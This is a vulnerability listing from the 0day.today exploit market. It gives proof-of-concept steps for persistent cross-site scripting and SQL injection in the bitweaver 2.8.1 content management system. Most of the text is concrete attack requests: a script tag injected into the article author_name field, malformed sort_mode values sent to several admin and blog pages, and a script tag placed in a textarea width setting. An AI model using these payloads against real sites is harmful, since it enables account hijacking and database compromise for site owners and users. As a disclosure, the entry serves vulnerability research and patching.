[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

bitweaver 2.8.1 Persistant XSS / SQL Injection Vulnerability

Author
lemlajt
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15440
Category
web applications
Date add
23-02-2011
Platform
php
# author: lemlajt
# software : bitweaver @ sourceforge.net
# version: 2.8.1
# tested on: linux
# cve :
#

 
PoC :
1. submit an article
POST http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/articles/edit.php
form-data; name="author_name"\r\n\r\nGuest"><script>alert('xss')</script>\

2. "Success Your article has been submitted and is awaiting approval.", next
3. log in as an admin, and go to page "Articles Home".
4. You'll see some arts and your added below. For this test we set topic 'persistant test':
' persistent test [ Submitted: Tuesday 22 of February, 2011 (12:18:26) ]'
Click it.
5. persistent xss.

* bonus: when bitweaver is running at test mode, you'll have an sql injection by visiting:
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/users/index.php?sort_mode=!@#$%^&*%28%29_}{}{:L%3E?%3E%3C
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/blogs/list_blogs.php?sort_mode=!@
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/blogs/list_blogs.php?sort_mode=!@

post http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/blogs/rankings.php
$sort_mode=!@

PoC :
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php?page=%27
 
sql injection in bitweaver 2.8

PoC :
1. Goto:
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/quicktags/admin/admin_quicktags.php?format_guid=tikiwiki&sort_mode=tagpos_asc
 
2. Data Tamper:
$find = ' sql
$sort_mode =
$format_guid =
$list_page =
 
 
bonus: xss
POST
http://localhost/www/cmsadmins/bitweaver2.8.1/bitweaver/kernel/admin/index.php
?
$liberty_textarea_height = "><...>
$liberty_textarea_width = "><script>here</script>



#  0day.today [2024-12-24]  #